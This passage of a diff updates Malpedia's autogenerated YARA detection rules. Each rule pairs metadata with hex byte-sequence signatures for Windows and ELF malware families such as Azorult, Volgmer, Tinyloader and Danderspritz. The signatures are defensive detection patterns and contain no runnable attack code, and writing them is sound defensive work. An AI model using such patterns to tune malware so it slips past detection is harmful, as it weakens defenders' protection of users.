+		$sequence_0 = { 8b35???????? 85c9 7403 51 ffd6 a1???????? }
+		$sequence_1 = { 6a40 6a00 8d4620 c70600000000 c7460400000000 c7460800000000 }
+		$sequence_2 = { 57 6aff 6a00 8d4508 c74424240f000000 }
+		$sequence_3 = { 756c ff15???????? 53 53 8d4d08 }
+		$sequence_4 = { 83c404 85c0 7428 8bb30c020000 8bf8 }
+		$sequence_5 = { 57 8d4304 c6437401 50 53 c7070c000000 c7431400000000 }
+		$sequence_6 = { 314608 8b470c 8bf9 31460c 0f1006 }
+		$sequence_7 = { 8b45f4 c1e808 0fb6c0 894e04 8bcb c1e918 }
+		$sequence_8 = { 8b4604 8d7604 85c0 75ee b801000000 }
+		$sequence_9 = { 57 03c3 895508 33ff 8945fc }
+		$sequence_10 = { 8b55f4 8b4485b0 85d2 8b56f8 7405 0d00020000 }
+		$sequence_11 = { 8b06 85c0 7543 8b46f8 8945ec }
+		$sequence_12 = { 8955e0 0f2805???????? 8b703c 03f0 b801000000 }
+		$sequence_13 = { c745bc56697274 50 57 c745c075616c41 }
+		$sequence_14 = { 51 ff55f4 8bf8 85ff 0f8423ffffff }
+		$sequence_15 = { 56 ff7034 ffd7 8945f8 85c0 }
 
 	condition:
-		7 of them and filesize < 433152
+		7 of them and filesize < 580608
 }
-rule MALPEDIA_Win_Electric_Powder_Auto : FILE
+rule MALPEDIA_Win_Unidentified_075_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "70f1fd4f-5a0a-57d1-8155-729a3e15c844"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.electric_powder_auto.yar#L1-L130"
+		id = "147c0d53-aecb-5cae-ac7f-14d52d3c203f"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_075_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "801118c2f636f6d2e21f384ccb7f80375d94dda489cf095ec07a8f466a0ae16c"
+		logic_hash = "10617fdfd534147bc5e0f7e922724e69d45c37af66d21f98c629fa1bac685120"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f84b6130000 8d8de0fbffff 8d5720 8d7102 668b01 83c102 }
-		$sequence_1 = { 8d8d68faffff e9???????? 8d8d5cf9ffff e9???????? 8d8df8faffff e9???????? 8b857cf9ffff }
-		$sequence_2 = { 3bd8 0f42d8 8d4301 85c0 7504 33f6 eb34 }
-		$sequence_3 = { 8b35???????? 81c230750000 89b574f9ffff 52 ffd6 68???????? 6a01 }
-		$sequence_4 = { 3b4e08 0f838e010000 8b4604 c704c810000000 8b5608 83ea01 }
-		$sequence_5 = { 0f4dd0 7ce7 56 8d7207 83e6f8 3bd6 }
-		$sequence_6 = { c645fc79 e8???????? c785e0fbffff00000000 81cf00010000 c785e4fbffff00000000 }
-		$sequence_7 = { c60600 8d8d30fcffff e8???????? 8d8520fdffff ba???????? 50 8d8da0fbffff }
-		$sequence_8 = { 8947fc eb0b 50 e8???????? 83c404 8bf8 8b4dfc }
-		$sequence_9 = { 8bf0 e9???????? 8b45f8 46 8b541004 8955ec 3bf2 }
+		$sequence_0 = { e8???????? 83c40c 6808020000 8d95dcf6ffff 52 6a00 }
+		$sequence_1 = { 8bc1 5e 5d c3 55 8bec ff15???????? }
+		$sequence_2 = { 52 e8???????? 6a00 8d85ace6ffff 50 8d8dbceeffff 51 }
+		$sequence_3 = { 83c40c 33c0 668985d4f4ffff 6806020000 }
+		$sequence_4 = { 837d9400 740d 8b55fc c7821002000000000000 837df000 }
+		$sequence_5 = { 52 ff15???????? 83c410 b853000000 66898550ffffff }
+		$sequence_6 = { 33c0 668945d0 8d4dd4 51 }
+		$sequence_7 = { 742c 8b4514 85c0 7421 }
+		$sequence_8 = { 85c0 0f8431ffffff b901000000 85c9 0f8515ffffff }
+		$sequence_9 = { 81eca4000000 894dfc c745f400000000 c745f800000000 }
 
 	condition:
-		7 of them and filesize < 565248
+		7 of them and filesize < 393216
 }
-rule MALPEDIA_Win_Bravonc_Auto : FILE
+rule MALPEDIA_Win_Moriagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6dc4fda1-21f0-5df6-853f-1dcbad03c148"
+		id = "e0e8552c-2a56-5880-9b39-e228e0ca2c36"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bravonc_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moriagent_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "773a75cc27f4f0e2a9753a7f457b50e9ee585cad286c778ed87544df88619b9a"
+		logic_hash = "f619de3127e38febd0ef7c0dec89df2ad37cda3381275176b5456add134d4a40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102445,32 +102636,32 @@ rule MALPEDIA_Win_Bravonc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4838 334820 334818 33480c }
-		$sequence_1 = { 68???????? e8???????? e8???????? be???????? 68???????? 56 c705????????03000000 }
-		$sequence_2 = { 8bce e8???????? eb03 8b7d08 8b1d???????? 8d45f4 }
-		$sequence_3 = { 33480c 334804 51 e8???????? 8b8ec0000000 53 ff75f0 }
-		$sequence_4 = { 334dec 57 ff75fc 334dfc }
-		$sequence_5 = { 5e c9 c20c00 55 8bec 81ec80020000 53 }
-		$sequence_6 = { 57 8bce ff15???????? 8bc6 5f 5e c9 }
-		$sequence_7 = { 8945f4 8b06 f7d8 23c1 03f3 8945fc }
-		$sequence_8 = { 334834 6a01 334828 334814 51 }
-		$sequence_9 = { eb02 33db 6a01 e8???????? 84c0 59 750d }
+		$sequence_0 = { e8???????? 83c408 8b55c4 8b45f0 40 }
+		$sequence_1 = { 47 8b048500844200 885c012e 3bfa 7cea 8b7ddc }
+		$sequence_2 = { c785e4efffff00000000 c785e8efffff00000000 c785ecefffff00000000 83fa10 722f }
+		$sequence_3 = { 3bc1 7767 85ff 7425 41 8d0442 56 }
+		$sequence_4 = { eb4c 8b4714 8bd9 2bda 2bc2 3bd8 7727 }
+		$sequence_5 = { 8bc1 c785e4fdfffffc010000 0f43d6 c785f0fdffff07000000 c785f4fdffff01800000 2bd0 0f1f4000 }
+		$sequence_6 = { 8d8dccefffff e8???????? 8d8dd4efffff e8???????? }
+		$sequence_7 = { 8b5d08 8b048500844200 56 57 8bfb 8b440818 }
+		$sequence_8 = { 83c408 85c0 742a f68568feffff10 7521 8b4704 8d4da8 }
+		$sequence_9 = { 7467 8b45e4 3bc8 7713 837de010 8bc7 894f10 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 720896
 }
-rule MALPEDIA_Win_Windealer_Auto : FILE
+rule MALPEDIA_Win_Listrix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87b31818-e67b-5c82-9927-08d581ce1fca"
+		id = "ae5c6849-5b5a-5879-a75b-5bc936755797"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.windealer_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.listrix_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "cda4114916f5f955b9ea27c4701626023386bb93ae37a566cf799b5d0e98aca8"
+		logic_hash = "a979992135eb70be35ff3f9edeaffae4a914b7c2e246324beb1e16b7e069112c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102484,34 +102675,34 @@ rule MALPEDIA_Win_Windealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 ff15???????? 85c0 7407 50 ff15???????? 6a01 }
-		$sequence_1 = { 6a04 50 6a04 68???????? 68???????? }
-		$sequence_2 = { 668b91d2070000 8a89d0070000 52 51 }
-		$sequence_3 = { 56 57 68da070000 e8???????? }
-		$sequence_4 = { 8b4d08 668b91d2070000 8a89d0070000 52 51 }
-		$sequence_5 = { 6a01 50 56 e8???????? 83c410 8bc7 }
-		$sequence_6 = { 53 56 57 68da070000 }
-		$sequence_7 = { 50 56 e8???????? 83c410 8b4618 }
-		$sequence_8 = { ff15???????? 85c0 7407 50 ff15???????? 6a01 }
-		$sequence_9 = { 8b4d08 668b91d2070000 8a89d0070000 52 }
+		$sequence_0 = { 50 ff15???????? 85f6 0f8492000000 0fb78deef7ffff }
+		$sequence_1 = { 51 52 50 8d8dc0f5ffff 51 }
+		$sequence_2 = { 55 8bec 33c0 8b4d08 3b0cc5186a4000 740a 40 }
+		$sequence_3 = { ebe6 c745e060614000 817de064614000 7311 8b45e0 8b00 85c0 }
+		$sequence_4 = { 817de45c614000 7311 8b45e4 8b00 85c0 }
+		$sequence_5 = { 8b5510 8d46ff 50 8b8584f5ffff 51 52 }
+		$sequence_6 = { 52 ff15???????? 68???????? 8d85f4f7ffff 50 }
+		$sequence_7 = { 668b4c4310 66890c457ca74000 40 ebe8 33c0 8945e4 3d01010000 }
+		$sequence_8 = { 7718 0f85b6000000 8b85a8f5ffff 3b857cf5ffff 0f86a4000000 0fb78deef7ffff }
+		$sequence_9 = { 52 ff15???????? 83c428 8d85f4fbffff 50 }
 
 	condition:
-		7 of them and filesize < 770048
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Danderspritz_Auto : FILE
+rule MALPEDIA_Win_Volgmer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1b0527de-0d7b-5ad4-aabc-a511337e98f1"
+		id = "c708d481-8667-53f5-aa6f-d4a1c7cf85b4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danderspritz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.danderspritz_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.volgmer_auto.yar#L1-L402"
 		license_url = "N/A"
-		logic_hash = "a3dc5330dc4023c2900af3ec5e9bf8ed5ecdce820fe76e6a6bb8f01cda67ce81"
+		logic_hash = "76496bf022136cb4a0da9750dca0578c8d8bf2a12423d01c51f00f5c1f22514f"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102523,34 +102714,68 @@ rule MALPEDIA_Win_Danderspritz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 3ac3 7534 4c8b15???????? 483bfb 4d8bca 0f94c2 }
-		$sequence_1 = { 48894360 4183f802 0f877bfeffff 4183e101 488bcb 418bd1 e8???????? }
-		$sequence_2 = { 7425 85d2 7421 3bc1 721d 3bc2 7219 }
-		$sequence_3 = { 4053 4883ec30 488bd9 85d2 753d 488d9198010000 488d0d75e60100 }
-		$sequence_4 = { 83f8ff 7505 e8???????? 8b0d???????? ff15???????? 4885c0 7404 }
-		$sequence_5 = { 4c8d0d5fe60300 4c8d0560e60300 488d1555e60300 488bc8 e8???????? 83f8ff 7525 }
-		$sequence_6 = { 0fb6da 498d4be0 4533c9 448bc0 498bd2 896c2448 66896c2434 }
-		$sequence_7 = { 488bfe 4885f6 759a 8b435c 83635400 894348 }
-		$sequence_8 = { 4103fd 488b4538 8a480c 80f9ff 7403 83c708 393e }
-		$sequence_9 = { 448bc0 ba02000000 488bcf e8???????? b800000010 488b9c2408010000 4881c4c0000000 }
+		$sequence_0 = { 4533c0 498bd5 33c9 c744242800000008 }
+		$sequence_1 = { 7454 33d2 488d4c2434 41b804040000 e8???????? 448d4606 }
+		$sequence_2 = { 7406 488bcf ff5588 4533c9 4533c0 33d2 }
+		$sequence_3 = { 4889442420 4c8d442448 418d5108 41ffd4 4c8d8da0030000 498bce }
+		$sequence_4 = { 4883c9ff 48ffc1 803c0800 75f7 66ffc1 488d8560030000 }
+		$sequence_5 = { 8801 488d4901 ffc0 3d00010000 7cf1 6644899600010000 }
+		$sequence_6 = { e8???????? e8???????? e8???????? c705????????04000000 }
+		$sequence_7 = { 488d8d270d0000 0f280d???????? 33d2 0fb705???????? 41b8c5010000 0f1185e40c0000 }
+		$sequence_8 = { 488d8d20050000 ff542460 488bcb ff542468 8bc6 }
+		$sequence_9 = { 488d8d400f0000 e8???????? 8bd6 c68435400f000000 488d8d400f0000 }
+		$sequence_10 = { e8???????? 85c0 740c 418bdd e9???????? 4983cfff }
+		$sequence_11 = { 33d2 41b808020000 6644896d80 e8???????? 488b3d???????? 33c0 }
+		$sequence_12 = { 3bd7 89542410 750d 57 }
+		$sequence_13 = { 89831c0c0000 eb15 8d4601 50 e8???????? 89831c0c0000 83c404 }
+		$sequence_14 = { 4833c4 48894537 4c8b25???????? 33c0 c745d701234567 8945a3 }
+		$sequence_15 = { 8bfe 83e03f c1ff06 6bd830 8b04bd80f17300 f644032801 }
+		$sequence_16 = { c1f906 6bf630 8b0c8d80f16e00 80643128fd 5f 5e }
+		$sequence_17 = { 6a26 58 0fb60c8536976e00 0fb6348537976e00 8bf9 8985b4f8ffff c1e702 }
+		$sequence_18 = { 6bd030 895de4 8b049d80f17300 8945d4 }
+		$sequence_19 = { 89855cf5ffff 0f84df040000 8d8618030000 50 8d85f4fbffff }
+		$sequence_20 = { 83e809 7443 83e801 0f8501010000 c745e0e4ba6e00 8b4508 8bcf }
+		$sequence_21 = { c645e316 ff15???????? 410fb7cd 668945e4 }
+		$sequence_22 = { 8b2d???????? 50 ffd5 8d942480000000 52 ff15???????? }
+		$sequence_23 = { 83f808 74ba 83f807 77c5 ff2485d1a86d00 8bce }
+		$sequence_24 = { f3ab 66ab 33c0 8d4c2404 89442409 51 }
+		$sequence_25 = { 448bc7 4803ce e8???????? 8d7709 488b5310 }
+		$sequence_26 = { 4c89642440 4c896c2438 488d3576a50100 4c8d056ba50100 }
+		$sequence_27 = { 663944244d 0f8593010000 488d4f10 4c8d442458 488d542458 448bce }
+		$sequence_28 = { 8d3c85c8f46e00 8b0f 85c9 740b }
+		$sequence_29 = { c6442412ed c644241396 c644241425 c644241528 c6442416fd }
+		$sequence_30 = { 8b04c520986e00 5d c3 33c0 }
+		$sequence_31 = { 56 83f815 0f8711010000 ff2485786b6d00 51 8d5106 }
+		$sequence_32 = { e8???????? 83c40c c785e0f3ffff00040000 8d85e0f3ffff 50 }
+		$sequence_33 = { 5d c3 b801000000 ebc5 b988130000 }
+		$sequence_34 = { 55 6a00 6a00 8d442410 6a1a }
+		$sequence_35 = { eb57 53 8b1c85d8886e00 56 6800080000 6a00 }
+		$sequence_36 = { e8???????? 29bb50000500 448bd8 3bbb54000500 }
+		$sequence_37 = { 88442419 c644241a13 c644241b0e c644241c5d c644241d9f }
+		$sequence_38 = { 48f7d1 4c8d0409 488d4dc0 e8???????? 4c8d4c2440 }
+		$sequence_39 = { 50 ff15???????? 837e0c00 8bf8 0f840a010000 8d8e18030000 51 }
+		$sequence_40 = { 428b4c8440 0f1f440000 3b8c8440010000 7419 48ffc0 }
+		$sequence_41 = { 41b800800000 e8???????? 81834c0005000080ffff 8183440005000080ffff }
+		$sequence_42 = { 6800010000 8db318010000 6a00 56 e8???????? 6800010000 }
+		$sequence_43 = { 8bf8 0f84df020000 8d8318030000 50 8d85bcf7ffff }
 
 	condition:
-		7 of them and filesize < 750592
+		7 of them and filesize < 393216
 }
-rule MALPEDIA_Elf_Persirai_Auto : FILE
+rule MALPEDIA_Win_Tinyloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71dd969e-17c7-51f6-8baa-f5813c4b7618"
+		id = "7c6fcb6a-6aaa-5e44-ad0b-2dda057bc513"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.persirai_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinyloader_auto.yar#L1-L224"
 		license_url = "N/A"
-		logic_hash = "8b3f4b08e462bfefa6597fd60f192d2977efdf6597eab8ae390529732ac3b197"
+		logic_hash = "a1e9a6fc8f29154daa76951045f8f779a6cee8d3fa483fe0d801eb90e6460914"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -102562,32 +102787,44 @@ rule MALPEDIA_Elf_Persirai_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d680c 8b400c 83e0fe 85c0 75e6 }
-		$sequence_1 = { 51 e8???????? 8d5c2424 89f1 89df 89e8 fc }
-		$sequence_2 = { 7423 0fbed0 a1???????? 8854243b 85c0 0f84f9000000 8810 }
-		$sequence_3 = { 52 8b5020 53 50 ff5208 83c410 }
-		$sequence_4 = { 6648 759f 53 53 57 8d44244c 50 }
-		$sequence_5 = { 56 53 83ec0c 89c7 be???????? }
-		$sequence_6 = { 89d0 5a 59 5b c3 8b442404 8b542408 }
-		$sequence_7 = { eb0c 89c2 8b02 39c1 75f8 8b01 8902 }
-		$sequence_8 = { e8???????? 89c3 8bb098000000 85f6 751c 50 50 }
-		$sequence_9 = { 84c0 742a 8d7600 46 3c25 742b 0fbed0 }
+		$sequence_0 = { f7d2 f7d1 5b 89d0 c1c010 6689c8 90 }
+		$sequence_1 = { 8b1d???????? 90 8998f8070000 90 }
+		$sequence_2 = { 83ec20 48 8d0db7130000 48 }
+		$sequence_3 = { 90 29d8 90 31db }
+		$sequence_4 = { 895838 90 48 89c6 90 48 0500400100 }
+		$sequence_5 = { 8b5d00 66894308 6a10 ffb5a8050000 }
+		$sequence_6 = { 637574 6541 0050ff 15???????? c705????????00010000 68???????? 68???????? }
+		$sequence_7 = { 81fb04030000 730d 90 83c004 90 83c304 }
+		$sequence_8 = { 90 0500400100 90 31db 90 90 }
+		$sequence_9 = { 0500080000 894520 ffb5a0050000 6802020000 ff15???????? }
+		$sequence_10 = { 8998f8070000 90 48 8b1d???????? 90 }
+		$sequence_11 = { 48 8d0dedffffff ff15???????? 48 83c420 }
+		$sequence_12 = { c70000000000 c7855808000000000000 8b5d00 039d58080000 6a00 }
+		$sequence_13 = { 83ec20 48 c7c100000000 48 8d15e6110000 }
+		$sequence_14 = { 90 8bbb97114000 90 8938 90 }
+		$sequence_15 = { 8b8540050000 8b5d00 894308 8b85f8070000 8b5d00 894304 }
+		$sequence_16 = { 3b8558080000 7402 ebb3 31c0 31db 31c9 31d2 }
+		$sequence_17 = { 8b1d???????? 90 895830 90 8b1d???????? 90 895838 }
+		$sequence_18 = { 8b85f8070000 8b5d00 894304 8b5d00 81c300040000 31c0 }
+		$sequence_19 = { 8b4500 83c00c ffd0 31db 8b4500 8b8000040000 }
+		$sequence_20 = { 8d0dea0e0000 ff15???????? 48 83c420 48 8d35d90e0000 48 }
+		$sequence_21 = { 01da 83c20c 310a 3b8558080000 7308 83c004 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Hermes_Auto : FILE
+rule MALPEDIA_Win_Azorult_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "40977080-f0db-509f-ad36-9106e881ac17"
+		id = "a0ff14cf-728e-57b5-b780-187246815def"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hermes_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.azorult_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "ec38569492fc62621d2bfb5ebe2db77f57521b3e9d7ddcf1c5d737c6a9cf9c68"
+		logic_hash = "b964bdc09887e46f350cee1282648afbe20db6ec0890aa267b03a312df1100f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102601,32 +102838,32 @@ rule MALPEDIA_Win_Hermes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 6a79 59 f7f1 }
-		$sequence_1 = { 6a01 6810660000 ff75fc ff15???????? }
-		$sequence_2 = { 50 8b4508 83c801 50 }
-		$sequence_3 = { 83c801 50 6a01 ff75fc }
-		$sequence_4 = { 7508 6a01 ff15???????? 8be5 5d c3 }
-		$sequence_5 = { 7508 6a01 ff15???????? 8be5 5d }
-		$sequence_6 = { 6a04 6800100000 6888130000 6a00 ff15???????? }
-		$sequence_7 = { 83c801 50 6a01 ff75fc ff15???????? }
-		$sequence_8 = { 50 6a01 6810660000 ff75fc ff15???????? }
-		$sequence_9 = { 7508 6a01 ff15???????? 8d45fc }
+		$sequence_0 = { 8901 8bc1 c7410410000000 5d c20400 55 8bec }
+		$sequence_1 = { ff15???????? 8b4dc8 8bd1 81e20000ff00 8bc1 c1e810 0bd0 }
+		$sequence_2 = { 83c410 5e c9 c3 55 8bec 81eccc060000 }
+		$sequence_3 = { 8d9adcbc1b8f 8b702c 03d9 337018 8bcf }
+		$sequence_4 = { 6a00 6a00 ff7508 ff7510 ff15???????? 85ff 7405 }
+		$sequence_5 = { e8???????? 84c0 0f8444010000 8d45d8 50 8d4dfc e8???????? }
+		$sequence_6 = { 83fa04 1bc0 83e004 8b443814 d3e8 884415f8 42 }
+		$sequence_7 = { 68???????? 680000baba 50 50 e8???????? a1???????? 85c0 }
+		$sequence_8 = { c3 55 8bec 81ec2c020000 56 8d85d8fdffff 33f6 }
+		$sequence_9 = { 80f920 74f4 80f97d 750c 8d4201 8907 8bc3 }
 
 	condition:
-		7 of them and filesize < 7192576
+		7 of them and filesize < 1073152
 }
-rule MALPEDIA_Win_Warezov_Auto : FILE
+rule MALPEDIA_Win_Hamweq_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ec3e9cd-ecfd-5888-8e71-8272853df26c"
+		id = "000e8959-0108-5c25-ad30-8e891fdada1d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warezov"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.warezov_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hamweq_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "8a169bcf46fd926fd65360d9ee1ccb1e67a44520c106569cb5acbfc473bbceb3"
+		logic_hash = "5208d20513fd6a1e5edd1bc25c2bf088fa1869066d91ad8af3cf21319dcb16db"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102640,32 +102877,32 @@ rule MALPEDIA_Win_Warezov_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a8c04cc000000 8a9404fc000000 02d1 8a8c04fd000000 889404fc000000 8a9404cd000000 02ca }
-		$sequence_1 = { c68424a300000065 c68424a400000062 c68424a500000075 c68424a600000070 c68424a700000077 889c24a8000000 c68424ad00000070 }
-		$sequence_2 = { ffd3 50 ff15???????? 85c0 8b942430010000 8902 7531 }
-		$sequence_3 = { 8d8c24a8000000 51 6a00 68???????? 8d9424b8010000 52 }
-		$sequence_4 = { c684243801000039 c6842439010000ac c684243a0100000f c684243b010000fe c684243c01000046 c684243d0100006a c684243e01000038 }
-		$sequence_5 = { 885e14 8b5008 56 8bcd 885a14 e8???????? eb78 }
-		$sequence_6 = { 0473 b142 f6e9 8ad8 8b06 80eb12 80cbcd }
-		$sequence_7 = { 33f6 4d 85ed ba77000000 7e50 8b74240c 53 }
-		$sequence_8 = { 32ca 888c049c020000 40 83f809 7ce3 8d8424a8020000 50 }
-		$sequence_9 = { c68424aa000000d3 c68424ab000000b8 c68424ac000000a9 c68424ad0000002e c68424ae00000049 c68424af00000041 }
+		$sequence_0 = { ff500c 56 e8???????? 8b06 }
+		$sequence_1 = { 8d8500feffff 50 ff5148 8b4e08 8b06 ff7138 }
+		$sequence_2 = { ff5744 50 8d8500feffff 50 }
+		$sequence_3 = { 51 ff5038 b906030000 33c0 80bdfcfdffff5c }
+		$sequence_4 = { 0f847a030000 85c0 0f8472030000 ff35???????? ff75f8 ffd6 }
+		$sequence_5 = { 50 8d45e0 50 ff750c 56 e8???????? 83c410 }
+		$sequence_6 = { ff7508 ff5020 8b4e08 8b06 ffb180010000 8d8decfeffff 51 }
+		$sequence_7 = { 8b0e ff30 33db ff5144 }
+		$sequence_8 = { 3ad0 742d 8b4c2414 8bd6 2bd1 8a19 3ad8 }
+		$sequence_9 = { 33c0 8dbdfcfdffff f3ab 8b4e08 8b06 ffb1e8000000 8d8dfcfdffff }
 
 	condition:
-		7 of them and filesize < 827392
+		7 of them and filesize < 24576
 }
-rule MALPEDIA_Win_Freenki_Auto : FILE
+rule MALPEDIA_Win_Moriya_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "67ab05f0-0092-5ff4-bb96-cc24a6a94dbc"
+		id = "59d11a0a-17d5-591e-bce9-2635239237cd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.freenki_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moriya"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moriya_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "a02a6867fe9e948b2e235fe875697f9d977ad7f0e52b8303d46cef856d876490"
+		logic_hash = "502cc93b2e63f3afc69dfd0a7f0cef3fdb24356c38e271e56341bfbf7336c1de"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -102679,32 +102916,32 @@ rule MALPEDIA_Win_Freenki_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75e4 ff15???????? 85c0 7920 8b45e4 50 8b08 }
-		$sequence_1 = { 89b5e4edffff 33c0 c785c0edffff00000000 50 51 8d8dccedffff c785e0edffff07000000 }
-		$sequence_2 = { 56 e8???????? 8b8d60ffffff 8bf8 8b45f0 83c404 8930 }
-		$sequence_3 = { 8bf8 83c404 85ff 0f84e4000000 6804010000 57 }
-		$sequence_4 = { 51 8d4dc0 c745e400000000 e8???????? c745fc00000000 }
-		$sequence_5 = { 0fb78194f74100 8d4902 6689840deafbffff 6685c0 75e9 56 }
-		$sequence_6 = { c745c000000000 c745c400000000 c745c800000000 ff15???????? 898554ffffff 57 85c0 }
-		$sequence_7 = { 0bc8 51 53 e8???????? 8bd8 83c408 85db }
-		$sequence_8 = { c3 56 57 53 ff75f4 ff75f8 }
-		$sequence_9 = { 83c202 6685c0 75f5 2bd1 8d8df8deffff d1fa 03d2 }
+		$sequence_0 = { e8???????? 4881c490000000 5b c3 4055 }
